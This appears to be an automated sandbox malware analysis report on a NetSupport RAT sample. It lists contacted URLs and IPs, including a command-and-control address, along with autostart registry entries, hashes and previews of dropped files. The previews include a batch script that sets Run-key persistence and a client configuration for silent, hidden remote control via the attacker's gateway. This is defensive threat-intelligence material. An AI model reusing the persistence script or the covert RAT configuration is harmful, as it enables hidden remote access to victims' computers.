http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s) | file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://www.pci.co.uk/supportsupport | file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://www.symauth.com/rpa00 | file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | false | | high
http://127.0.0.1RESUMEPRINTING | file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://%s/testpage.htm | file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | false | | high
http://geo.netsupportsoftware.com/location/loca.asp0 | shv.exe, 00000005.00000002.4131206311.0000000000B90000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.netsupportschool.com/tutor-assistant.asp11( | file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://geo.netsupportsoftware.com/Echo | shv.exe, 00000005.00000002.4131206311.0000000000B90000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://127.0.0.1 | shv.exe, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://www.symauth.com/cps0( | file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | false | | high
http://www.netsupportschool.com/tutor-assistant.asp | file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://%s/fakeurl.htm | file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | false | | high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.1.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
45.61.128.74 | unknown | United States | 9009 | M247GB | true
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1562378
                                                                  Start date and time:2024-11-25 14:57:09 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 11m 2s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:16
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:file.exe
                                                                  Detection:MAL
                                                                  Classification:mal92.rans.evad.winEXE@19/13@1/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 82%
                                                                  • Number of executed functions: 171
                                                                  • Number of non-executed functions: 102
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • VT rate limit hit for: file.exe
Time | Type | Description
08:58:34 | API Interceptor | 17843064x Sleep call for process: shv.exe modified
13:58:06 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\shv.exe
13:58:15 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\shv.exe
13:58:23 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\shv.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.26.1.231 | Pyyidau.vbs | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
 | file.exe | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
 | file.exe | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
 | CiscoSetup.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse | geo.netsupportsoftware.com/location/loca.asp
 | Advanced_IP_Scanner_2.5.4594.12.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse | geo.netsupportsoftware.com/location/loca.asp
 | Advanced_IP_Scanner_2.5.4594.12.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse | geo.netsupportsoftware.com/location/loca.asp
 | file.exe | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
 | NeftPaymentError_Emdtd22102024_jpg.exe | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
 | NeftPaymentError_Emdtd22102024_jpg.exe | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
 | Update.js | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
45.61.128.74 | file.exe | Get hash | malicious | NetSupport RAT | Browse | http://45.61.128.74/fakeurl.htm
 | file.exe | Get hash | malicious | NetSupport RAT | Browse | http://45.61.128.74/fakeurl.htm
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
geo.netsupportsoftware.com | Pyyidau.vbs | Get hash | malicious | NetSupport RAT | Browse | 104.26.1.231
 | Pyyidau.vbs | Get hash | malicious | NetSupport RAT | Browse | 104.26.0.231
 | file.exe | Get hash | malicious | NetSupport RAT | Browse | 104.26.0.231
 | file.exe | Get hash | malicious | NetSupport RAT | Browse | 104.26.0.231
 | KC0uZWwr8p.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse | 104.26.0.231
 | KC0uZWwr8p.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse | 104.26.0.231
 | 72BF1aHUKl.msi | Get hash | malicious | NetSupport RAT | Browse | 172.67.68.212
 | hkpqXovZtS.exe | Get hash | malicious | NetSupport RAT | Browse | 104.26.0.231
 | file.exe | Get hash | malicious | NetSupport RAT | Browse | 104.26.1.231
 | file.exe | Get hash | malicious | NetSupport RAT | Browse | 104.26.1.231
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
M247GB | loligang.ppc.elf | Get hash | malicious | Mirai | Browse | 104.224.90.41
 | comprobante.exe | Get hash | malicious | Remcos | Browse | 176.10.80.43
 | 7jBzTH9FXQ.exe | Get hash | malicious | Unknown | Browse | 95.174.64.138
 | fACYdCvub8.exe | Get hash | malicious | Unknown | Browse | 95.174.66.19
 | 7jBzTH9FXQ.exe | Get hash | malicious | Unknown | Browse | 193.29.107.181
 | fACYdCvub8.exe | Get hash | malicious | Unknown | Browse | 217.138.199.203
 | arm5.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 192.230.38.194
 | x86_64.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 38.202.249.45
 | mips.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 38.204.82.51
 | file.exe | Get hash | malicious | Unknown | Browse | 91.202.233.141
CLOUDFLARENETUS | LAQfpnQvPQ.exe | Get hash | malicious | Snake Keylogger | Browse | 172.67.177.134
 | DGTCkacbSz.xlsx | Get hash | malicious | Snake Keylogger | Browse | 172.67.129.178
 | idk_1.ps1 | Get hash | malicious | Unknown | Browse | 172.67.129.178
 | FreeCs2Skins.ps1 | Get hash | malicious | Unknown | Browse | 172.67.129.178
 | Ref#2056119.exe | Get hash | malicious | AgentTesla, XWorm | Browse | 104.26.13.205
 | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 172.64.41.3
 | file.exe | Get hash | malicious | LummaC Stealer | Browse | 172.67.155.47
 | PO#86637.exe | Get hash | malicious | AgentTesla, PureLog Stealer, zgRAT | Browse | 104.26.13.205
 | 0Xp3q1l7De.exe | Get hash | malicious | Remcos | Browse | 172.64.41.3
 | DO-COSU6387686280.pdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 104.21.24.198
                                                                  No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\Public\Netstat\HTCTL32.DLL | file.exe | Get hash | malicious | NetSupport RAT | Browse |
 | file.exe | Get hash | malicious | NetSupport RAT | Browse |
 | KC0uZWwr8p.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse |
 | KC0uZWwr8p.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse |
 | file.exe | Get hash | malicious | NetSupport RAT | Browse |
 | file.exe | Get hash | malicious | NetSupport RAT | Browse |
 | CiscoSetup.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse |
 | CiscoSetup.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse |
 | CiscoSetup.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse |
 | CiscoSetup.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse |
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):328056
                                                                                      Entropy (8bit):6.754723001562745
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                      MD5:2D3B207C8A48148296156E5725426C7F
                                                                                      SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                      SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                      SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\HTCTL32.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                      • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                      • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                      • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                      • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):257
                                                                                      Entropy (8bit):5.119720931145611
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
                                                                                      MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                                                                      SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                                                                      SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                                                                      SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                                                                      Malicious:false
                                                                                      Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18808
                                                                                      Entropy (8bit):6.22028391196942
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                      MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                      SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                      SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                      SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICHEK.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):3735416
                                                                                      Entropy (8bit):6.525042992590476
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
                                                                                      MD5:00587238D16012152C2E951A087F2CC9
                                                                                      SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                                                                      SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                                                                      SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):396664
                                                                                      Entropy (8bit):6.809064783360712
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                      MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                      SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                      SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                      SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\TCCTL32.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):700
                                                                                      Entropy (8bit):5.533099732210104
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Wrqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuZIAlkz6:mqzEmPZly6YBlLoG1fXXfDioIAaz6
                                                                                      MD5:5778ABD7CF2E8039239CD5982281D61A
                                                                                      SHA1:9AA6E80A115343A100031C9473FC6A071EEFD07E
                                                                                      SHA-256:0BD4DC8B66C588F715B117021EF14C959E396F5CC6041F885F0D121401BC267A
                                                                                      SHA-512:DC01567D881D48554732747A286AC9A95EF095B4CB860F384B85636B160778C9EFE366F53550B74D9DDF504B293F03BBB252E5247F03490E4567AD142DEF6E0A
                                                                                      Malicious:false
                                                                                      Preview:0x289612fe....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=45.61.128.74:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):773968
                                                                                      Entropy (8bit):6.901559811406837
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                      MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                      SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                      SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                      SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):519
                                                                                      Entropy (8bit):5.1565107291104475
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:HVj0Kprgidqu1M+Vj0Kprgidqu1oOrvuprgidqu1kprgidqu1oOC:HVyINVyI4cIjI4T
                                                                                      MD5:B50D05F1710CD8674DB0AE8207722DD0
                                                                                      SHA1:9896143256FB62F915EA41D8001AD10BC66D99BB
                                                                                      SHA-256:F4A4726FDF39D43807ED2786BB9B2F881C8C7C8B666E14A96F7B2239C7A4BEDD
                                                                                      SHA-512:3D57684675904055EA3BAAE6E343F5B5A068104EBF97EDFA28687A18855B3F5173847B9283C704636A457B434CA3ACB9D27A4075ECBCD1E5F6A2735B1E444D04
                                                                                      Malicious:true
                                                                                      Preview:@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..start %Public%\Netstat\shv.exe..REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..start %Public%\Netstat\shv.exe
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:Windows setup INFormation
                                                                                      Category:dropped
                                                                                      Size (bytes):328
                                                                                      Entropy (8bit):4.93007757242403
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                      MD5:26E28C01461F7E65C402BDF09923D435
                                                                                      SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                      SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                      SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                      Malicious:false
                                                                                      Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):33144
                                                                                      Entropy (8bit):6.737780491933496
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                      MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                      SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                      SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
